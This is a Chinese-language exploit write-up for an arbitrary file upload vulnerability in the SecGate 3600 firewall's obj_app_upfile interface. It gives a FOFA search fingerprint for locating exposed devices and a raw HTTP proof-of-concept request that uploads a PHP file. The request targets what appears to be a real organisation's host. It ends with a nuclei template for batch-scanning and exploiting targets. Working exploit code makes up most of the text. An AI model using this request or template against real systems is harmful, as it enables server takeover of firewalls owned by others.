网神SecGate 3600防火墙obj_app_upfile任意文件上传漏洞

漏洞简介

网神 SecGate 3600 防火墙 obj_app_upfile接口存在任意文件上传漏洞，攻击者通过构造特殊请求包即可获取服务器权限

影响范围

网神SecGate 3600防火墙

漏洞复现

fofa语法：fid="1Lh1LHi6yfkhiO83I59AYg=="
登录页面如下：

POC：

POST /?g=obj_app_upfile HTTP/1.1
Host: jg.zhongdinggroup.com:8889
Accept: */*
Accept-Encoding: gzip, deflate
Content-Length: 574
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="upfile"; filename="test.php"
Content-Type: text/plain

<?php phpinfo();?>

------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundaryJpMyThWnAxbcBBQc
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundaryJpMyThWnAxbcBBQc--

默认上传路径 /secgate/webui/attachements/ ， 访问 attachements/test.php 文件

nuclei批量yaml文件

id: SecGate_3600_obj_app_upfile_upload

info:
  name: 网神SecGate 3600防火墙obj_app_upfile任意文件上传漏洞
  author: mhb17
  severity: critical
  tags: upload
  description: fofa  fid="1Lh1LHi6yfkhiO83I59AYg=="
variables:
  file_name: "{{to_lower(rand_text_alpha(8))}}.php"
requests:
  - raw:
      - |-
        POST /?g=obj_app_upfile HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Accept-Encoding: gzip, deflate
        Content-Length: 549
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc
        User-Agent: Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.0; Trident/4.0)

        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="MAX_FILE_SIZE"

        10000000
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="upfile"; filename="{{file_name}}"
        Content-Type: text/plain

        <?php phpinfo();?>

        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="submit_post"

        obj_app_upfile
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc
        Content-Disposition: form-data; name="__hash__"

        0b9d6b1ab7479ab69d9f71b05e0e9445
        ------WebKitFormBoundaryJpMyThWnAxbcBBQc--
      - |+
        GET /attachements/{{file_name}} HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          - "contains(body_2, 'phpinfo()')"
          - "status_code_1 == 302 && status_code_2 == 200"
        condition: and